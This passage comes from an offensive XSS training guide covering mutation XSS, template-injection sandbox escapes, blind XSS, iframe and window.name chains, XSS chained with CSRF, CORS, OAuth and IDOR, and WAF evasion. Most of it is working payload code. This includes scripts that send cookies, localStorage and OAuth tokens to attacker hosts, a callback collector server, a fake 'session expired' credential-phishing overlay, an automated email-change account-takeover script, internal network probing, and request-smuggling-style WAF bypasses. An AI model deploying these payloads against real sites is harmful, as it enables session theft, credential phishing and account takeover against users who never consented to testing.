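const candidate = '<svg><title><a href="</title><img onerror=alert(1)>';
const first  = roundTrip(candidate);
const second = roundTrip(first);
console.log(first);
console.log(first === second);      // false means the markup changes again on re-parse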

Exploitation:

Classic mXSS Example

<!-- Input to sanitizer: -->
<listing><img title="</listing><img src=x onerror=alert(1)>">

<!-- Sanitizer sees: an <img> tag with a title attribute. Looks safe. Allows it. -->
<!-- Sanitizer outputs: <listing><img title="</listing><img src=x onerror=alert(1)>"> -->

<!-- Browser's HTML parser: -->
<!-- Inside <listing> (raw text element in HTML4), </listing> actually CLOSES the tag -->
<!-- Result in DOM:
  <listing></listing>
  <img title="
  <img src=x onerror=alert(1)>
     ↑ This second img is now IN THE DOM and executes!
-->

mXSS via Namespace Confusion

<!-- Input: -->
<svg></p><style><a id="</style><img src=x onerror=alert(1)>">

<!-- Browser behavior differs between HTML parser and SVG (XML) parser -->
<!-- When innerHTML is set and re-parsed, context switches cause mutation -->

DOMPurify and mXSS

Multiple DOMPurify bypasses have been discovered via mXSS. The library authors play a continuous cat-and-mouse game with the browser's mutation behavior.

Known bypass (patched in DOMPurify 2.0.1):
<svg><p><style><g title="</style><img src=x onerror=alert(1)>">

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 8: Client-Side Template Injection (CSTI) — When Templates Execute Your Input

Client-side template injection occurs when a client-side JavaScript template engine evaluates user-controlled input as a template expression rather than as plain text. The distinction matters because template expressions are executed by the template engine's sandbox — and sandbox escapes lead to arbitrary JavaScript execution.

1. The Angular Template Injection — The Classic Case:

  • AngularJS (the original version 1.x) used double curly brace syntax {{ expression }} for template interpolation, and it would scan the DOM for these patterns and evaluate them as Angular expressions. The critical vulnerability was that Angular's expression evaluator was sandboxed, but the sandbox had escape vectors discovered by researchers.
  • If an application inserted user input directly into the page and Angular was processing the page as a template, injecting {{ 7 * 7 }} would produce 49 on the page — proving that template evaluation was running on your input. From there, you'd work toward a sandbox escape.
  • The sandbox escape evolved as Angular patched each discovered vector. Here's a representative one from AngularJS 1.5.x to illustrate the concept:
// AngularJS sandbox escape — this executes arbitrary JS through the template engine
{{
    constructor.constructor('alert(1)')()
}}

// If an app constructs Angular templates dynamically:
Input: {{constructor.constructor('alert(1)')()}}

// In AngularJS (1.x):
{{$on.constructor('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}

The logic is:

  • constructor on any Angular expression object gives you the constructor function of that object. constructor.constructor on that gives you Function — the global Function constructor that creates executable functions from strings. ('alert(1)')() creates a function that calls alert(1) and immediately invokes it. This escapes the sandbox entirely.
  • Angular has strong built-in sanitization but has its own dangerous patterns:
// DANGEROUS — bypassSecurityTrustHtml:
import { DomSanitizer, SafeHtml } from '@angular/platform-browser';

@Component({
  template: `<div [innerHTML]="trustedHtml"></div>`
})
export class MyComponent {
  trustedHtml: SafeHtml;
  
  constructor(private sanitizer: DomSanitizer) {
    // This bypasses Angular's sanitizer!
    this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml(userInput);
  }
}

// Also dangerous:
bypassSecurityTrustScript()
bypassSecurityTrustUrl()
bypassSecurityTrustResourceUrl()
bypassSecurityTrustStyle()

// Angular template injection (server-side rendering or template compilation):
{{constructor.constructor('alert(1)')()}}

2. Vue.js Template Injection:

  • Vue has a similar surface. The v-html directive is essentially innerHTML — it renders raw HTML and is the direct DOM XSS vector. But more subtle is when user input ends up inside a Vue template that's compiled at runtime, or when a developer uses new Vue({ template: userInput }).
// If an application does this (which is a serious mistake):
new Vue({
    template: '<div>' + userControlledInput + '</div>'
});

// An attacker can inject Vue template syntax that escapes to JS:
// Input: {{ constructor.constructor('alert(1)')() }}

// DANGEROUS — v-html directive:
<div v-html="userContent"></div>  // No escaping!

// DANGEROUS — render functions with user data:
render(h) {
    return h('div', { domProps: { innerHTML: userInput } }); // XSS
}

// DANGEROUS — $el.innerHTML assignment in lifecycle hooks

// SAFE:
<div>{{ userContent }}</div>  // Auto-escaped

3. React.js Template Injection:

  • React escapes content by default when using JSX — but has explicit escape hatches:
// SAFE — React escapes this:
const UserGreeting = ({ name }) => <div>Hello, {name}!</div>

// DANGEROUS — dangerouslySetInnerHTML bypasses all escaping:
const UserContent = ({ html }) => (
    <div dangerouslySetInnerHTML={{ __html: html }} />
);

// DANGEROUS — href can accept javascript: URIs:
const Link = ({ url }) => <a href={url}>Click</a>
// If url = "javascript:alert(1)", React renders it as-is
// React 16.9+ logs a console warning for javascript: URLs but still renders them

// DANGEROUS — eval/Function usage:
const DynamicComponent = ({ code }) => {
    const result = eval(code); // Never do this
};
  • React-Specific Finding: Client-Side Routing
// React Router can reflect URL data:
import { useParams, useSearchParams } from 'react-router-dom';

function UserPage() {
    const { username } = useParams();
    // If username is used in dangerouslySetInnerHTML downstream...
    return <UserProfile data={fetchUser(username)} />;
}

How to identify CSTI in the wild:

  • Your canary for CSTI is a mathematical expression: inject {{7*7}} and observe the output. If the page renders 49, the template engine is evaluating your input. If it renders {{7*7}} literally, it's not. Also test ${7*7} for ES6 template literal contexts, and <%= 7*7 %> for ERB-style templating. Each different output tells you something different about the engine being used.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 9: Advanced Vectors in Modern Applications

1. CSS Injection → Data Exfiltration:

  • While not direct XSS, CSS injection can exfiltrate data (useful when XSS is blocked):
/* Exfiltrate CSRF token character by character: */
input[name=csrf_token][value^=a] { background: url('https://attacker.com/x?v=a'); }
input[name=csrf_token][value^=b] { background: url('https://attacker.com/x?v=b'); }
/* ... generate for all possible chars */
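Writing those rules by hand doesn't scale, so in practice you generate them. A hedged sketch, assuming you can inject a <style> element and that attacker.com stands in for your collection server:

// Generate one attribute-prefix selector per candidate character; whichever
// rule matches fires a background request that leaks the next character
const charset = 'abcdefghijklmnopqrstuvwxyz0123456789';
const css = [...charset].map(c =>
    'input[name=csrf_token][value^="' + c + '"]{background:url(https://attacker.com/x?v=' + c + ')}'
).join('\n');

const style = document.createElement('style');
style.textContent = css;
document.head.appendChild(style);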

2. Prototype Pollution → XSS:

  • Prototype pollution vulnerabilities in libraries can create XSS sinks:
// Vulnerable library code:
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

// Attacker input as JSON:
{"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}}

// Later in application code:
element[someProperty] = value;
// If someProperty lands on a polluted prototype chain entry...
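To make the pollution-to-sink path concrete, here's a hedged end-to-end sketch that reuses the vulnerable merge() above; the template property and the widget element are illustrative gadget stand-ins, not a specific library's API:

// Attacker-controlled JSON: JSON.parse creates an own "__proto__" key, which the
// naive merge() then recurses into, landing on Object.prototype
const attackerJson = '{"__proto__": {"template": "<img src=x onerror=alert(1)>"}}';
const config = {};
merge(config, JSON.parse(attackerJson));    // Object.prototype.template is now polluted

// Elsewhere, library code trusts a config property it never set itself:
const widget = document.getElementById('widget');
widget.innerHTML = config.template || '<p>default</p>';
// config has no own "template", so the lookup falls through to the polluted
// prototype — and the img/onerror payload lands in the DOM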

3. WebSocket XSS:

// Vulnerable code:
const ws = new WebSocket('wss://victim.com/chat');
ws.onmessage = (event) => {
    document.getElementById('chat').innerHTML += event.data; // SINK
};

// Attack: Control WebSocket messages → XSS payload
// Vector: MitM if not WSS, or server-side injection into WS messages

4. Dangling Markup Injection:

  • When you can't execute JS but can inject HTML, you can exfiltrate data via dangling markup:
<!-- If XSS is blocked but HTML injection is possible: -->
<img src="https://attacker.com/?data=
<!-- This img tag is left "open", the browser continues parsing until it finds a quote -->
<!-- Any text (including CSRF tokens, secret values) between here and the next quote -->
<!-- becomes part of the src URL and is sent to attacker! -->

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 10: Blind XSS — When Your Payload Fires Somewhere You Can't See

Blind XSS is one of the highest-value attack techniques in real bug bounty work, and it's conceptually elegant: you inject a payload into an input that you can't directly observe — a contact form, a support ticket, a feedback field, a log viewer — and you design the payload to call back to your server when it executes, wherever and whenever that might be.

Why Blind XSS exists:

  • Consider a customer support application. A user fills out a support form. The data goes into a database. A support agent logs into the admin panel and views the ticket. The admin panel renders the stored data. If the rendering is unsanitized, the XSS fires in the admin's browser — a browser that the attacker has no visibility into. The attacker never sees the admin panel. They just have to trust that their payload will reach it eventually.
  • The payload for blind XSS must be self-contained and must exfiltrate data back to you, because you can't see the browser console. It needs to do several things: execute reliably, collect useful information about the page it's running in (cookies, current URL, page HTML, localStorage contents), and send that data to a server you control without triggering browser security restrictions. A simple example:
// A basic blind XSS callback payload
// This loads an external script from your server, which then runs in the victim's context
// The loaded script can be far more sophisticated than what you'd inject inline
<script src="https://your-server.com/hook.js"></script>
  • The hook.js file on your server contains the actual payload — it can be as complex as you want, without the constraints of fitting inside an HTML attribute. When it executes in the victim's browser, it might do something like this:
// hook.js — executes in the victim's browser (your controlled server)
(function() {
    // Collect everything useful from the current page context
    const data = {
        url: window.location.href,           // Which admin page are we on?
        cookies: document.cookie,            // Any non-HttpOnly cookies
        localStorage: JSON.stringify(localStorage), // Stored tokens, preferences
        html: document.documentElement.outerHTML,   // The full page HTML
        timestamp: new Date().toISOString()
    };
    
    // Exfiltrate via an image request (works even with restrictive CSPs
    // that block fetch/XHR, because img.src is rarely blocked)
    new Image().src = 'https://your-server.com/collect?' + 
        new URLSearchParams(data).toString();
    
    // Also try navigator.sendBeacon which works even as the page unloads
    navigator.sendBeacon('https://your-server.com/collect', JSON.stringify(data));
})();
  • XSSHunter is the canonical tool for blind XSS. It provides hosted infrastructure that captures callbacks with full page screenshots, cookie data, DOM content, and origin information. When a payload fires anywhere — even months after injection — XSSHunter records exactly what it found and sends you an email. Setting it up gives you a professional callback infrastructure without maintaining your own server. For self-hosted needs, you can use Caido's OOB features or a simple Express server with a /collect endpoint.

Why Blind XSS escalates to critical:

  • When a blind XSS fires in an admin panel, the stakes are completely different from a self-XSS. You're running JavaScript in the context of the highest-privilege user in the application.
  • From that vantage point, you can read all of the page's content (user data, configuration, internal notes), perform actions as the admin (create accounts, escalate privileges, delete data), extract the admin's session token from the page's requests, and potentially pivot to internal network resources that are accessible from the admin's browser but not from the public internet.
  • A blind XSS that fires in an admin panel is almost always a critical or high-severity finding. Bug bounty programs pay very well for these because the business impact — an attacker silently controlling the admin interface — is enormous.

Why It's Powerful:

  • Executes in admin panels (full application control)
  • Executes in internal tools (bypasses external WAFs)
  • Fires in support ticket systems (phish admins)
  • Fires on a long delay (weeks later, when an audit log is finally reviewed)

Blind XSS Payload:

  • You need an out-of-band channel to prove execution:
// Minimal blind XSS callback payload:
<script>
new Image().src = 'https://your-collector.com/x?' + 
    encodeURIComponent(JSON.stringify({
        url: location.href,
        cookies: document.cookie,
        localStorage: JSON.stringify(localStorage),
        userAgent: navigator.userAgent,
        timestamp: new Date().toISOString()
    }));
</script>

xsshunter.com / Custom Collector Setup:

  • Professional bug hunters set up XSS callback collectors. Here's a minimal Node.js collector:
const express = require('express');
const app = express();

app.get('/x', (req, res) => {
    console.log('[BLIND XSS FIRED]');
    console.log('  URL:', req.query.url);
    console.log('  Cookies:', req.query.cookies);
    console.log('  IP:', req.ip);
    console.log('  User-Agent:', req.headers['user-agent']);
    
    // Respond with 204 No Content so the <img> beacon completes quietly
    res.set('Access-Control-Allow-Origin', '*');
    res.status(204).end();
});

// Terminate TLS in front of this (nginx, Caddy) or use Node's https module so
// that https:// payload URLs can reach the collector
app.listen(8080);

Payload Injection Points for Blind XSS:

User registration: First name, Last name, Username, Bio
Profile fields: Job title, Company, Phone, Address
Feedback forms: Message, Subject, Issue description
E-commerce: Order notes, Shipping instructions, Product reviews
Support tickets: Issue description, Steps to reproduce
User-Agent header: Viewable in analytics dashboards
Referer header: Server access logs shown in admin panels
X-Forwarded-For: Shown in server logs (IP spoofing)
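Header-based injection points can't be seeded from a browser payload (User-Agent is a forbidden header for fetch), so you plant them from your own client. A minimal Node sketch; target.com and your-server.com are placeholders:

// Plant a blind XSS payload in the User-Agent header; if an analytics dashboard
// or log viewer later renders the UA string as HTML, hook.js fires there
const https = require('https');

https.get({
    host: 'target.com',
    path: '/',
    headers: {
        'User-Agent': '"><script src=https://your-server.com/hook.js></script>'
    }
}, res => res.resume());   // drain the response; we only care about sending the request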

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 11: JavaScript Sandbox Escapes

Beyond template engine sandboxes, browsers themselves implement isolation boundaries — the same-origin policy for iframes, sandboxed iframe restrictions, and the distinction between different browsing contexts. Understanding how JavaScript code running in one context can affect or escape to another is important for chaining exploits.

The iframe inheritance model:

  • When you create an iframe with about:blank as its source, the new frame inherits the origin of its parent. This means that JavaScript running in that about:blank iframe is same-origin with the parent and can read and write to the parent's DOM. This is sometimes used as a technique in exploit chains — you create a child frame, write HTML into it, and use it as a staging area for further execution, because the parent's CSP might not apply uniformly to the child.
// Creating an about:blank iframe that inherits parent origin
const frame = document.createElement('iframe');
frame.src = 'about:blank';
document.body.appendChild(frame);

// Writing to the child frame — it's same-origin, so this works
frame.contentDocument.write('<script>alert(document.domain)<\/script>');

The srcdoc attribute:

  • An iframe's srcdoc attribute lets you specify the full HTML content of the frame as an attribute value. The resulting frame is same-origin with the parent.
  • This is relevant for CSP bypasses — some CSP configurations block inline scripts on the main page but don't restrict what happens inside a srcdoc iframe.
<!-- Normal iframe — loads a URL, document gets that URL's origin -->
<iframe src="https://example.com/child.html"></iframe>

<!-- srcdoc iframe — content is the attribute value, origin is parent's origin -->
<iframe srcdoc="<h1>Hello</h1><script>alert(document.domain)<\/script>"></iframe>

The window.name persistence:

  • The window.name property persists across navigations within the same tab — it survives even when you navigate to a completely different origin. This creates a cross-origin data channel: a page at evil.com can set window.name to a long string of data, then navigate the tab to victim.com.
  • If victim.com reads window.name and sinks it into the DOM, that's a cross-origin DOM XSS via the window.name source. It's a relatively rare source that many scanners miss. One caveat: newer browser versions clear window.name on cross-site navigations as part of storage partitioning, so treat this as a technique for same-site hops, legacy browsers, and older engines embedded in applications.
<!-- evil.com/attack.html -->
<!DOCTYPE html>
<html>
<body>
<script>
    // Set window.name to the XSS payload
    // This string will survive the upcoming navigation to victim.com
    window.name = '<img src=x onerror="fetch(\'https://evil.com/collect?c=\'+document.cookie)">';
    
    // Now navigate the same tab to victim.com
    // The key: we're navigating, not opening a new tab
    // window.name persists through navigation of the same browsing context
    location.href = 'https://victim.com/dashboard';
    
    // After this navigation completes:
    // - The document changes from evil.com to victim.com
    // - The origin changes from evil.com to victim.com
    // - BUT window.name remains our payload string
</script>
</body>
</html>

Full Exploit chain:

Step 1 — Use HTML injection to inject a srcdoc iframe:

Your HTML injection payload:

<iframe srcdoc="
    <script>
        top.location = 'https://evil.com/set-name?return=' + 
                       encodeURIComponent(top.location.href);
    </script>
"></iframe>
  • Wait — the parent CSP blocks inline scripts. Does srcdoc inherit this restriction? In the specific browser version you're targeting, the srcdoc frame's inline script is blocked by the inherited CSP.
  • So you try a different approach — use srcdoc to inject a <meta> redirect, which doesn't require script execution:
<iframe srcdoc="
    <meta http-equiv='refresh' content='0;url=https://evil.com/set-name'>
"></iframe><!-- evil.com/set-name.html -->
<script>
    // We're in an iframe — set THIS frame's window.name
    window.name = '<img src=x onerror="navigator.sendBeacon(\'https://evil.com/c\',document.cookie)">';
    
    // Navigate this frame back to victim.com
    // window.name persists through this navigation
    location.href = 'https://victim.com/dashboard';
</script>
  • <meta refresh> is not a script — it's an HTML directive. The CSP script-src doesn't restrict it. The hidden iframe navigates to evil.com/set-name.

Step 2 — evil.com/set-name sets window.name and redirects back:

<!-- evil.com/set-name.html -->
<script>
    // We're in an iframe — set THIS frame's window.name
    window.name = '<img src=x onerror="navigator.sendBeacon(\'https://evil.com/c\',document.cookie)">';
    
    // Navigate this frame back to victim.com
    // window.name persists through this navigation
    location.href = 'https://victim.com/dashboard';
</script>

Step 3 — The iframe returns to victim.com with the poisoned window.name:

  • Now we have an iframe on victim.com's page where window.name is the XSS payload. If victim.com's initialization code reads window.name and sinks it, the XSS fires. But remember — the main page's window.name is clean. Only the iframe's window.name is poisoned.
  • So the target code must be one that runs in the iframe context, or the exploit chain needs another step. This is where about:blank can come in — if the XSS fires in the iframe (which is now victim.com origin), it can access parent.document and parent.localStorage because parent and iframe are same-origin.
  • The key insight: These three techniques — about:blank inheritance, srcdoc CSP interaction, and window.name persistence — are not independent tricks. They're primitives that compose. A chain might use srcdoc to escape a CSP restriction, window.name to smuggle a payload across an origin boundary, and about:blank to execute code in a same-origin context that has access to the parent's sensitive data. When you understand each primitive at the mechanism level, you can compose them situationally based on what the target allows and restricts.
  • That compositional thinking — taking a set of primitives and combining them to achieve an objective that none of them can achieve alone — is the core intellectual skill of advanced offensive security research. Every technique in this curriculum is a primitive. Learning to chain them is what makes you dangerous.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 12: Chaining XSS with Other Vulnerabilities

XSS alone is powerful, but XSS as the first link in a multi-vulnerability chain is where truly critical findings are built. Understanding how to chain vulnerabilities requires understanding what XSS gives you (same-origin JavaScript execution in a victim's browser) and what you still need (actions that require other users' identities or access to resources outside the victim's accessible scope).

Chain 1: XSS + CSRF

  • Cross-Site Request Forgery is a vulnerability where an attacker's page causes a victim's browser to make an authenticated request to a target site. CSRF defenses typically involve a CSRF token — a secret value embedded in forms that the attacker cannot read cross-origin due to the Same-Origin Policy.
  • XSS completely bypasses CSRF tokens. Since your JavaScript runs same-origin, you can read CSRF tokens directly from the DOM and include them in forged requests. The attack flow looks like this: the attacker injects a stored XSS payload into the target application. When the victim loads the page, the XSS fires. The JavaScript reads the CSRF token from the page using document.querySelector('input[name="csrf_token"]').value. It then constructs a fetch() request to a sensitive endpoint (change email, change password, make a payment) that includes both the victim's session cookie (automatically attached by the browser) and the CSRF token. The request looks entirely legitimate to the server.
// XSS payload that chains with CSRF to change the victim's email
(async function() {
    // Step 1: Load the account settings page to extract the CSRF token
    const settingsPage = await fetch('/account/settings', {
        credentials: 'include'  // Include session cookies
    });
    const html = await settingsPage.text();
    
    // Step 2: Parse the CSRF token from the page
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    const csrfToken = doc.querySelector('input[name="_csrf"]').value;
    
    // Step 3: Submit the email change with the victim's session and CSRF token
    await fetch('/account/change-email', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: `email=attacker@evil.com&_csrf=${csrfToken}`
    });
    
    // Step 4: Trigger a password reset to the attacker-controlled email
    await fetch('/account/forgot-password', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: `email=attacker@evil.com`
    });
})();
  • This is a full account takeover in four steps, entirely automated, executed in the victim's browser without any visible indication that anything happened.
  • Example 2:
// Step 1: Fetch the page to get the CSRF token
fetch('/account/settings')
    .then(r => r.text())
    .then(html => {
        // Parse CSRF token from DOM
        const parser = new DOMParser();
        const doc = parser.parseFromString(html, 'text/html');
        const token = doc.querySelector('input[name=csrf_token]').value;
        
        // Step 2: Submit the action with the valid CSRF token
        return fetch('/account/change-email', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: `email=attacker@attacker.com&csrf_token=${token}`,
            credentials: 'include'
        });
    });

Chain 2: XSS + CORS Misconfiguration

  • If an API origin like internal-api.victim.com reflects arbitrary origins in Access-Control-Allow-Origin and sets Access-Control-Allow-Credentials: true (the wildcard * is not permitted with credentials), JavaScript running via your XSS can call it and read the authenticated responses:
// From victim.com (via XSS), call internal APIs:
fetch('https://internal-api.victim.com/admin/users', {
    credentials: 'include'
})
.then(r => r.json())
.then(data => {
    fetch('https://attacker.com/collect?d=' + btoa(JSON.stringify(data)));
});

Chain 3: XSS + Self-XSS Upgrade via CSRF

If only self-XSS is found (user can only XSS themselves):

  • Find a CSRF vulnerability in the profile-update endpoint
  • Use CSRF to force the victim to store the XSS payload in their own profile (a minimal sketch follows this list)
  • When the victim views their profile, the XSS fires
  • Self-XSS is upgraded to persistent XSS via CSRF
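A minimal sketch of step 2, as JavaScript running on an attacker-hosted page. The endpoint and field name are assumptions, the chain presumes the profile-update endpoint lacks CSRF protection, and modern SameSite=Lax cookie defaults may block the cross-site POST:

// Build and auto-submit a cross-site form that stores the payload in the
// victim's own profile; their browser attaches their session cookie
const form = document.createElement('form');
form.action = 'https://victim.com/profile/update';
form.method = 'POST';

const bio = document.createElement('input');
bio.type = 'hidden';
bio.name = 'bio';
bio.value = '<img src=x onerror=alert(document.domain)>';
form.appendChild(bio);

document.body.appendChild(form);
form.submit();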

Chain 4: XSS + OAuth Token Theft

// Application stores OAuth access token in localStorage:
const token = localStorage.getItem('access_token');

// XSS payload exfiltrates it:
fetch('https://attacker.com/steal?t=' + localStorage.getItem('access_token'));

// Now attacker calls API directly with stolen token:
// GET /api/user/profile
// Authorization: Bearer <stolen_token>

Chain 5: XSS → Phishing via Full Page Control

  • An XSS payload can inject arbitrary HTML and CSS into a page, overlaying it entirely. A sophisticated payload might hide the current page's content and display a convincing "session expired, please log in" modal that posts credentials to an attacker-controlled server. The victim is on the legitimate domain (bank.com), the URL bar shows the legitimate domain, the page looks legitimate — but the form is controlled by the attacker.
// XSS payload that injects a credential phishing overlay
const overlay = document.createElement('div');
overlay.style.cssText = `
    position: fixed; top: 0; left: 0; width: 100%; height: 100%;
    background: rgba(255,255,255,0.98); z-index: 999999;
    display: flex; align-items: center; justify-content: center;
`;
overlay.innerHTML = `
    <div style="max-width:400px; padding:40px; box-shadow:0 4px 20px rgba(0,0,0,0.15); border-radius:8px;">
        <h2 style="margin-top:0;">Session Expired</h2>
        <p>Please re-enter your credentials to continue.</p>
        <form id="phishForm">
            <input type="text" placeholder="Username" style="width:100%; margin:8px 0; padding:10px; box-sizing:border-box;"><br>
            <input type="password" placeholder="Password" style="width:100%; margin:8px 0; padding:10px; box-sizing:border-box;"><br>
            <button type="submit" style="width:100%; padding:12px; background:#0066cc; color:white; border:none; border-radius:4px; cursor:pointer;">
                Sign In
            </button>
        </form>
    </div>
`;
document.body.appendChild(overlay);

// Intercept form submission and exfiltrate credentials
overlay.querySelector('#phishForm').addEventListener('submit', function(e) {
    e.preventDefault();
    const [user, pass] = overlay.querySelectorAll('input');
    // Exfiltrate to attacker server
    navigator.sendBeacon('https://evil.com/creds', JSON.stringify({
        site: location.hostname,
        username: user.value,
        password: pass.value
    }));
    overlay.remove(); // Remove the overlay — victim thinks login succeeded
});
  • Example 2:
// Replace entire page content:
document.body.innerHTML = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;background:white">
  <h1>Session Expired</h1>
  <p>Please enter your credentials to continue:</p>
  <form action="https://attacker.com/phish" method="POST">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <button type="submit">Login</button>
  </form>
</div>`;

Chain 6: XSS + IDOR → Reading or Modifying Other Users' Data

  • An Insecure Direct Object Reference vulnerability means the server doesn't verify that the requesting user has permission to access a resource — it just serves it if you know the ID.
  • Normally, discovering an IDOR requires being able to make requests with specific IDs and read the responses, which the SOP blocks for cross-origin requests. But XSS eliminates this barrier.
  • If you have stored XSS on a platform where users have profile IDs, and you know (or can enumerate) the ID of a target user — say an admin — your XSS payload can make authenticated same-origin fetch requests to /api/users/ADMIN_ID/profile, read the response (because same-origin), and exfiltrate the data. The SOP doesn't protect same-origin reads. IDOR without XSS is medium severity. IDOR plus XSS can become critical.
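A hedged sketch of what that payload might look like — the endpoint shape, ID range, and collector URL are all assumptions about a hypothetical target:

// Same-origin IDOR reads from inside the XSS context: the SOP permits reading
// these responses because the requests never leave the victim origin
(async () => {
    const loot = [];
    for (let id = 1; id <= 50; id++) {
        const res = await fetch('/api/users/' + id + '/profile', { credentials: 'include' });
        if (res.ok) loot.push(await res.json());
    }
    navigator.sendBeacon('https://your-server.com/idor', JSON.stringify(loot));
})();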

Chain 7: XSS → Full Account Takeover via Session Hijacking

  • The direct path to account takeover is session cookie theft, but HttpOnly blocks document.cookie for session cookies in well-configured applications. The workaround is not to steal the cookie but to steal a session-equivalent value that the application uses.
  • Many applications include an API token or Bearer token in their JavaScript's localStorage — and localStorage is not protected by HttpOnly. Your XSS payload reads localStorage.getItem('authToken') or iterates all localStorage keys, exfiltrates the token, and the attacker uses it directly in API requests from their own machine with Authorization: Bearer <stolen_token>. The session is taken over without ever needing the cookie.
  • For applications that use httpOnly cookies exclusively and have no alternative session values in storage, the XSS-to-takeover path goes through action-based takeover (like the CSRF chain above) — changing the email and resetting the password — rather than direct credential theft.

Chain 8: XSS → Internal Network Pivoting via fetch()

  • This is one of the most underappreciated capabilities of browser-based XSS. The victim's browser has access to internal network resources that the attacker does not — internal admin panels, development servers, internal APIs, IoT devices on the local network, router admin interfaces.
  • The victim's browser can reach http://192.168.1.1 (their router). The attacker's server cannot.
  • An XSS payload can use the victim's browser as a proxy to probe internal resources. The payload makes fetch() requests to internal IP ranges. The Same-Origin Policy still applies — you can't read cross-origin response bodies or headers — but you don't need to: whether a no-cors fetch resolves or rejects, how long it takes, and whether image or script loads fire onload versus onerror all reveal which hosts and ports are alive. The payload exfiltrates what it infers (a probe sketch follows this list).
  • This turns browser-based XSS into a network reconnaissance tool against targets that are inaccessible from the public internet.
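A hedged probe sketch along those lines. Timing and promise settlement are the only signals, the IP range is an assumption, mixed-content blocking interferes if the compromised page is HTTPS and the internal service is not, and Chrome's Private Network Access rules may block some of these requests:

// Probe an internal /24 from the victim's browser: a no-cors fetch to a live
// host resolves (opaque response); a dead host rejects after a network error
async function probe(host) {
    const started = performance.now();
    try {
        await fetch('http://' + host + '/', { mode: 'no-cors', cache: 'no-store' });
        return { host, alive: true, ms: Math.round(performance.now() - started) };
    } catch (err) {
        return { host, alive: false, ms: Math.round(performance.now() - started) };
    }
}

(async () => {
    const results = [];
    for (let octet = 1; octet <= 254; octet++) {
        results.push(await probe('192.168.1.' + octet));
    }
    navigator.sendBeacon('https://your-server.com/scan', JSON.stringify(results));
})();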

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 13: WAF Fingerprinting and Evasion

A Web Application Firewall sits between the client and the server, inspecting HTTP requests and blocking those that match attack signatures. Most WAF evasion relies on the same fundamental principle as filter bypass: find the gap between what the WAF considers malicious and what the backend parser considers executable. That gap is your payload space.

Fingerprinting the WAF:

  • Before you try to evade a WAF, you need to know what you're dealing with. Different WAFs have different signature sets, different blocking behaviors, and different blind spots. The fingerprint comes from observing how the WAF responds to known-bad inputs.
  • Inject an obviously malicious string like <script>alert(1)</script> and observe the response. A WAF block typically manifests as a specific HTTP status code (403 is common, but some WAFs use 200 with a block page, 406, or even 501), a distinctive response body ("Forbidden by WAF", "Access Denied", a Cloudflare interstitial), or distinctive response headers (X-Sucuri-ID, X-WAF-Event-Info, the Server header changing to Cloudflare, etc.). Once you know which WAF you're dealing with — Cloudflare, Akamai, AWS WAF, ModSecurity, Imperva — you can research its known bypass techniques.

1. Chunked Transfer Encoding:

  • HTTP supports chunked transfer encoding, where the request body is sent in pieces with each piece prefixed by its length in hex.
  • Some WAFs inspect the request body as it arrives in chunks and don't reassemble it before pattern matching.
  • The backend server, however, reassembles the chunks into the complete payload before processing. This discrepancy can allow an attacker to split a malicious string across chunk boundaries in a way that no individual chunk triggers the WAF signature, but the reassembled payload is intact.
POST /search HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

6
q=<scr
4
ipt>
8
alert(1)
9
</script>
0
  • Not all WAFs are vulnerable to this, and not all backends support chunked encoding for all endpoints, but it's worth testing in content types that accept a body.

2. HTTP Parameter Pollution:

  • Many WAFs inspect the value of the q parameter in a request. If you send the same parameter twice, the WAF might inspect the first occurrence while the backend uses the last (or concatenates them, depending on the framework). This is HTTP Parameter Pollution (HPP):
GET /search?q=safe&q=<script>alert(1)</script>
  • If the WAF only checks the first q value and the backend's framework uses the last, your payload bypasses the inspection. The behavior is highly framework-dependent — PHP's $_GET keeps the last value, ASP/ASP.NET concatenates duplicates with commas, Node's querystring and Express's qs parsers return an array of all values, and Java Servlets' getParameter() returns the first — so you need to understand the target's backend stack.

3. Charset Confusion:

  • Some WAFs decode request content using a default character encoding (usually UTF-8) before pattern matching. If you specify a different charset in the Content-Type header, the backend might decode the content differently than the WAF did.
  • Historical examples involved UTF-16 or IBM EBCDIC encoded bodies where the WAF saw garbled bytes but the backend decoded them correctly. Modern WAFs are better at this, but charset confusion still surfaces in complex environments where different components have different encoding assumptions.
# A related trick is content-type confusion: send JSON but claim form-encoded (or vice versa)
# The WAF may parse the body one way while the application parses it another
POST /comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded

{"text":"<script>alert(1)</script>"}

4. Comment Insertion in JavaScript Context:

  • JavaScript ignores /* */ block comments and // line comments. In a JavaScript string context injection, you can sometimes insert comments within your payload to break up signature strings:
// These are all equivalent in JavaScript
alert(1)
al/**/ert(1)
al\u0065rt(1)     // Unicode escape in identifier
a\u006cert(1)
self['ale'+'rt'](1)
window['al'+'ert'](1)
  • The string alert might be in a WAF's signature. The versions above are not the literal string alert but evaluate identically. Similarly, HTML comments within certain HTML parsing contexts can break up tag patterns that WAF signatures look for.

5. Path Confusion:

  • Some WAFs apply different inspection profiles to different URL paths. A path like /api/v2/search might get a lighter inspection than /login. Testing your payloads across multiple endpoint paths on the same application can reveal inconsistent WAF enforcement.

Concrete Scenario:

  • Let's say you're testing a fintech application. The application has the following URL structure:
/login                          → Authentication endpoint
/api/v2/search                  → Product/account search
/api/v2/transactions            → Transaction history
